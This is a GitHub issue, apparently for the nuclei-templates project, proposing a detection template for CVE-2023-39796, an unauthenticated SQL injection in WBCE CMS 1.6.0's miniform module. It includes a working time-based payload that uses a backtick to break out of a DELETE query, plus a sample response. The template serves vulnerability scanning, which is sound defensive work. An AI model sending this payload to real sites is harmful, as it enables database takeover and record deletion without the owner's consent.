### ISSUE TITLE
CVE-2023-39796

### ISSUE THREAD

**Issue by TheYoungPope** [projectdiscovery/nuclei-templates#8629]
### Template Information:

There is an sql injection vulnerability in **miniform** module which is a default module installed in the **WBCE** cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database.

In file `/modules/miniform/ajax_delete_message.php` there is no authentication check. On line `40` in this file, there is a `DELETE` query that is vulnerable, an attacker could jump from the query using tick sign - ```.

Function `addslashes()` (https://www.php.net/manual/en/function.addslashes.php) escapes only these characters and not a tick sign:
* single quote (')
* double quote (")
* backslash (\)
* NUL (the NUL byte)

Reference links:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39796
- https://forum.wbce.org/viewtopic.php?pid=42046#p42046
- https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
- https://pastebin.com/PBw5AvGp

### Nuclei Template:

```yaml
id: CVE-2023-39796

info:
  name: WBCE 1.6.0 - Unauthenticated SQL Injection
  author: young pope
  severity: critical
  description: |
    There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
  remediation: Fixed in version 1.6.1
  reference:
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39796
    https://forum.wbce.org/viewtopic.php?pid=42046#p42046
    https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39796
  tags:
    cve,cve2023,sqli,wbce

http:
  - method: POST
    path:
      - "{{BaseURL}}/modules/miniform/ajax_delete_message.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record"
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "{\"message\":\"Record deleted successfully!\",\"success\":true}")'

```

Example response is received after 6s and looks like this:
```http
HTTP/1.1 200 OK
Date: Wed, 15 Nov 2023 14:49:21 GMT
Server: Apache/2.4.57 (Debian)
Set-Cookie: phpsessid-8701-sid=dn9moasher7n0755mvvpqpocom; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 57
Connection: close
Content-Type: text/html; charset=UTF-8

{"message":"Record deleted successfully!","success":true}
```
